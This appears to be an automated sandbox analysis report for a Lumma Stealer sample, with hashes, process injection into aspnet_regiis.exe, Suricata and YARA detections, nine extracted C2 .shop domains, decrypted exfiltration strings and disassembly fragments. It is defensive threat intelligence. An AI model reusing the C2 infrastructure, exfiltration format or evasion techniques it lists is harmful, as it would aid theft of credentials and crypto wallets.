Edit tour

Windows Analysis Report
Armanivenntii_crypted_EASY.exe

Overview

General Information

Sample name:	Armanivenntii_crypted_EASY.exe
Analysis ID:	1577513
MD5:	795197155ca03f53eed7d90a2613d2a7
SHA1:	e177b0c729b18f21473df6decd20076a536e4e05
SHA256:	9a28b8f494f4f89738766b98f51242ceb5e2207175db7f6682e729451c83fdcf
Tags:	18521511316185215113209bulletproofexeLummaStealeruser-abus3reports
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Armanivenntii_crypted_EASY.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\Armanivenntii_crypted_EASY.exe" MD5: 795197155CA03F53EED7D90A2613D2A7)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 7408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

WerFault.exe (PID: 7920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7408 -s 1648 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["charecteristicdxp.shop", "consciousourwi.shop", "cagedwifedsozm.shop", "potentioallykeos.shop", "weiggheticulop.shop", "deicedosmzj.shop", "weaknessmznxo.shop", "interactiedovspm.shop", "southedhiscuso.shop"], "Build id": "LPnhqo--uzkmvityzcqq"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1965031546.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1921423227.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2014107650.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2034108887.0000000002BC4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1967689413.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2021275005.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1966024248.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1921687992.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1866290772.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1964834206.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1921423227.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1866213868.0000000002C19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1867576709.0000000002C16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2013964863.0000000002C18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1920704083.0000000002C18000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2013739073.0000000002C0A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.1866963896.0000000002BCD000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7408	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7408	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 7408	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 17 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:40.141083+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	23.55.153.106	443	TCP
2024-12-18T14:46:42.722528+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-18T14:46:46.202441+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	172.67.157.254	443	TCP
2024-12-18T14:46:54.945532+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	172.67.157.254	443	TCP
2024-12-18T14:47:00.482296+0100	2028371	3	Unknown Traffic	192.168.2.4	49740	172.67.157.254	443	TCP
2024-12-18T14:47:05.081834+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	172.67.157.254	443	TCP
2024-12-18T14:47:10.368912+0100	2028371	3	Unknown Traffic	192.168.2.4	49743	172.67.157.254	443	TCP
2024-12-18T14:47:13.323735+0100	2028371	3	Unknown Traffic	192.168.2.4	49744	172.67.157.254	443	TCP
2024-12-18T14:47:16.248484+0100	2028371	3	Unknown Traffic	192.168.2.4	49745	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:44.969235+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-18T14:46:53.381370+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49733	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:44.969235+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49732	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:53.381370+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49733	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (cagedwifedsozm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:37.349272+0100	2055291	1	Domain Observed Used for C2 Detected	192.168.2.4	51450	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:37.043038+0100	2055293	1	Domain Observed Used for C2 Detected	192.168.2.4	51995	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (consciousourwi .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:38.089179+0100	2055295	1	Domain Observed Used for C2 Detected	192.168.2.4	56837	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deicedosmzj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:37.578557+0100	2055297	1	Domain Observed Used for C2 Detected	192.168.2.4	62972	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:36.816300+0100	2055299	1	Domain Observed Used for C2 Detected	192.168.2.4	49960	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:36.582167+0100	2055301	1	Domain Observed Used for C2 Detected	192.168.2.4	54063	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (southedhiscuso .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:37.868270+0100	2055303	1	Domain Observed Used for C2 Detected	192.168.2.4	61376	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weaknessmznxo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:36.278477+0100	2054790	1	Domain Observed Used for C2 Detected	192.168.2.4	52043	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weiggheticulop .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:38.319716+0100	2055307	1	Domain Observed Used for C2 Detected	192.168.2.4	58571	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:59.011555+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49735	172.67.157.254	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T14:46:40.902599+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49731	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Armanivenntii_crypted_EASY.exe

Avira: detected

Antivirus detection for URL or domain

Source: cagedwifedsozm.shop	Avira URL Cloud: Label: malware
Source: weaknessmznxo.shop	Avira URL Cloud: Label: malware
Source: consciousourwi.shop	Avira URL Cloud: Label: malware
Source: weiggheticulop.shop	Avira URL Cloud: Label: malware
Source: potentioallykeos.shop	Avira URL Cloud: Label: malware
Source: interactiedovspm.shop	Avira URL Cloud: Label: malware
Source: https://southedhiscuso.shop:443/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.Armanivenntii_crypted_EASY.exe.6cdc0000.1.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["charecteristicdxp.shop", "consciousourwi.shop", "cagedwifedsozm.shop", "potentioallykeos.shop", "weiggheticulop.shop", "deicedosmzj.shop", "weaknessmznxo.shop", "interactiedovspm.shop", "southedhiscuso.shop"], "Build id": "LPnhqo--uzkmvityzcqq"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\d3d9x.dll

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: Armanivenntii_crypted_EASY.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\d3d9x.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Armanivenntii_crypted_EASY.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: weiggheticulop.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: consciousourwi.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: southedhiscuso.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: deicedosmzj.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cagedwifedsozm.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: charecteristicdxp.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: interactiedovspm.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: potentioallykeos.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: weaknessmznxo.shop
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000002.00000002.2309770623.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--uzkmvityzcqq

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_00414B89 CryptUnprotectData,

2_2_00414B89

Source: Armanivenntii_crypted_EASY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: Armanivenntii_crypted_EASY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	2_2_0041F090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_0040A0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebx+edx], 0000h	2_2_004140A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_00436120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_0040F27F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041538C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	2_2_0041538C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add edi, 02h	2_2_0040F403
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000A90h]	2_2_0041C490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	2_2_0041C490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [00440054h], 00000000h	2_2_0043354F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	2_2_00420D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00420D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp+60h]	2_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h	2_2_00414570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_00416D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	2_2_00404E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000774h]	2_2_00422EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esi+18h]	2_2_00422EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	2_2_00416720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp+00000084h]	2_2_004157D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then xor eax, eax	2_2_0041F7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_0041C0AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00409940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	2_2_0041F178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00422130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_00411199
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	2_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	2_2_00403A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00432220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	2_2_00411B5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	2_2_00411B5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000B8h]	2_2_00412367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0042BB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	2_2_0041DB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, edx	2_2_00434B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp]	2_2_00410B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00421465
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_00418C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h	2_2_0041A400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp+04h]	2_2_00412CE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, word ptr [esi+eax]	2_2_004304E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [00440054h], 00000000h	2_2_00433DAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, edx	2_2_00434661
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], A3C1F363h	2_2_00411B5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	2_2_00411B5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	2_2_00412691
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	2_2_0041D6A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004186A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	2_2_004186A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_004036B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, edx	2_2_00434770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	2_2_00413F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	2_2_00422700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h	2_2_0041FF23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ecx, dword ptr [esp+60h]	2_2_004147CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], A3C1F363h	2_2_004147CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	2_2_004137BD

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055297 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (deicedosmzj .shop) : 192.168.2.4:62972 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055301 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop) : 192.168.2.4:54063 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054790 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weaknessmznxo .shop) : 192.168.2.4:52043 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055299 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop) : 192.168.2.4:49960 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055295 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (consciousourwi .shop) : 192.168.2.4:56837 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055307 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (weiggheticulop .shop) : 192.168.2.4:58571 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055293 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop) : 192.168.2.4:51995 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055303 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (southedhiscuso .shop) : 192.168.2.4:61376 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055291 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (cagedwifedsozm .shop) : 192.168.2.4:51450 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49731 -> 23.55.153.106:443
